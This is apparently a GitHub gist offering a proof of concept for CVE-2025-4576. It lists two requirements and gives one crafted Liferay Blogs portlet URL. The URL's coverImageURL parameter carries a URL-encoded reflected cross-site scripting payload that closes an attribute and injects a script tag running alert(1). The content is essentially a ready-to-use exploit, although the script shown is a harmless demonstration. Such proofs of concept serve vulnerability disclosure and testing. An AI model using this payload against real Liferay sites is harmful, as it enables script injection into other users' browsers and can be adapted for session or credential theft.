Skip to content

Instantly share code, notes, and snippets.

@bolhasec
Created August 9, 2025 22:06
Show Gist options
  • Select an option

  • Save bolhasec/e6c336b3013233969c0fdbe523deab57 to your computer and use it in GitHub Desktop.

Select an option

Save bolhasec/e6c336b3013233969c0fdbe523deab57 to your computer and use it in GitHub Desktop.
poc-CVE-2025-4576

Requirements

  • full portlet URL
  • valid _com_liferay_blogs_web_portlet_BlogsPortlet_urlTitle
https://<blog full portlet URL>?p_p_id=com_liferay_blogs_web_portlet_BlogsPortlet&_com_liferay_blogs_web_portlet_BlogsPortlet_mvcRenderCommandName=%2Fblogs%2Fview_entry&_com_liferay_blogs_web_portlet_BlogsPortlet_urlTitle=<VALID TITLE>&_com_liferay_blogs_web_portlet_BlogsPortlet_coverImageURL=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment